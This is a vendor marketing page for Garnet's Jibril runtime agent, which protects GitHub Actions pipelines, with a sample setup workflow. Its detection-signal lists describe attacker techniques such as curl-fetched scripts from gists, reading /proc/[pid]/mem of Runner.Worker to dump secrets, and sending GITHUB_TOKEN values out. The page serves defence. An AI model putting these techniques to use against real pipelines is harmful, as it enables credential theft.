garnet.ai
garnet

Runtime Protection for GitHub Actions

Protect your CI/CD pipelines from supply chain attacks, credential theft, and malicious code execution with behavioral monitoring that detects what static scanning misses.

Request a DemoDocumentation
CI/CD Pipeline Security with Garnet and Jibril

The GitHub Actions Threat Landscape

Modern CI/CD pipelines face sophisticated runtime threats that static scanning and code reviews can't detect. These attacks exploit the high-privilege environment of your workflows to steal secrets and compromise your supply chain.

Supply Chain Compromises

Attackers compromise third-party actions and dependencies, like the tj-actions/changed-files incident (CVE-2025-30066), to execute malicious code within your trusted workflow, even after security scans.

Credential Theft

Malicious workflows extract environment secrets and tokens by accessing process memory (/proc/[pid]/mem), manipulating the CI environment, or examining .git/config files to silently exfiltrate credentials.

"Pwn Request" Attacks

Workflows triggered by pull_request_target run with repository permissions but can be tricked into executing attacker-controlled code when they checkout PR code, enabling privilege escalation.

Exploited Privileges

GitHub Actions runners operate with elevated permissions - attackers exploit these privileges through workflow_run triggers or GITHUB_TOKEN abuse to access sensitive resources and perform unauthorized actions.

Artifact Poisoning

Attackers craft malicious artifacts that, when extracted during workflows, can write files to arbitrary locations through path traversal vulnerabilities, bypassing job isolation and enabling privilege escalation.

Resource Theft

Attackers hijack CI compute resources for cryptocurrency mining or other unauthorized uses through long-running processes and fileless malware techniques that evade static detection.

Runtime Security with Garnet & Jibril

Attacks can leverage legitimate features in malicious ways

Complete Runtime Protection

Jibril, our runtime security agent, monitors GitHub Actions workflows at the kernel level, while the Garnet platform provides centralized management, integrations, and alerts.

  • Behavioral Threat Detection

    Monitors process executions, memory access, and network connections during workflow runs to catch suspicious activity in real-time

  • Active Protection

    Blocks malicious actions like memory dumps, unauthorized network connections, and suspicious process spawns before they succeed

  • Supply Chain Monitoring

    Identifies when third-party actions or dependencies attempt to access sensitive data or execute unexpected commands

Jibril monitoring GitHub Actions workflows through the Garnet platform

Secure Your GitHub Actions Workflows

Simple Integration with GitHub Actions

Add to Your Workflow

Install the Garnet platform with Jibril security monitoring as one of your first workflow steps to protect the entire execution process, with minimal performance impact due to its eBPF-based architecture.

name: Build and Test with Security

jobs:
  build:
    runs-on: ubuntu-latest
      
    steps:
      - uses: actions/checkout@v3
        # Pin to specific SHA for security
        with:
          ref: refs/heads/main
      
      - name: Setup Garnet Security Monitoring
        uses: listendev/action@v0.16.0
        with:
          jwt: ${{ secrets.LSTN_API_KEY }}
          runtime: only
          
      # Your existing steps continue below
      # Garnet will monitor all subsequent steps for threats

Note: Our GitHub Action is currently published under the name listendev/action (our former product name) while we complete our platform migration to Garnet. The functionality and protection are the same.

Runtime Protection

Jibril monitors your workflow at the kernel level using eBPF, detecting and blocking malicious behaviors like those used in the tj-actions/changed-files compromise, where attackers dumped process memory to extract secrets.

Enterprise Monitoring Integration

For enterprise environments, the Garnet platform provides centralized visibility across all repositories, integrating with audit logs and performance metrics to identify security anomalies at scale while maintaining compliance requirements.

How Jibril Detects Real CI/CD Attacks

Supply Chain Attack Detection

In the tj-actions/changed-files incident (CVE-2025-30066), Jibril detected the attack immediately by identifying the malicious script download and memory access patterns before secrets could be leaked.

Detection signals:

  • Unexpected curl requests to gist.githubusercontent.com for script downloads
  • Direct reads of /proc/[pid]/mem targeting the Runner.Worker process
  • Base64-encoded data being written to logs after memory access

Privilege Escalation Prevention

Jibril detects and prevents "Pwn Request" attacks and workflow_run privilege escalation attempts by monitoring checkout operations and suspicious process behaviors that static scanning can't predict.

Detection signals:

  • Checkout operations referencing PR branches inpull_request_target events
  • GitHub API calls attempting to modify repository content
  • Network requests containing GITHUB_TOKEN values or other credentials

Injection Attack Prevention

Detect context injection attacks where malicious branches or PR titles contain command injection payloads leveraging event data that's only known at runtime.

Detection signals:

  • Shell commands with suspicious special characters like backticks, semicolons, or other non-alphanumeric characters
  • Unexpected process spawns from GitHub event-related inputs
  • Abnormal shell process trees indicating command injection

Artifact Poisoning Protection

Protect against file traversal vulnerabilities during artifact extraction that could enable attackers to write files outside the expected directory and execute arbitrary code.

Detection signals:

  • File operations during artifact extraction writing outside target directories
  • Process creation immediately following artifact restoration
  • Unexpected file path patterns indicating path traversal attempts

Why Garnet & Jibril for CI/CD Security

Protection Where Static Scanning Fails

Static analysis misses dynamic threats because malicious code is often injected after scanning, leverages legitimate features, or exhibits behaviors that only manifest at runtime.

  • Detects retroactively updated version tags pointing to malicious commits
  • Identifies attacks that leverage untrusted event data only known at runtime
  • Catches dynamically loaded malicious code from external sources

Performance-Optimized Security

Jibril's eBPF-based architecture provides comprehensive monitoring with minimal impact on workflow performance.

  • Event-less design with negligible performance overhead
  • Kernel-level integration for efficient monitoring
  • No workflow modifications needed for protection

Active Threat Response

Don't just detect attacks - actively block them before damage can occur.

  • Block memory access attempts that target secrets
  • Prevent unauthorized network connections to malicious domains
  • Stop suspicious processes from executing during workflows

Secure Your CI/CD Pipeline Against Modern Threats

Don't let your GitHub Actions workflows become the weak link in your security posture. Deploy the Garnet platform with Jibril runtime monitoring to protect against supply chain attacks, credential theft, and malicious code execution.

Schedule a DemoView Documentation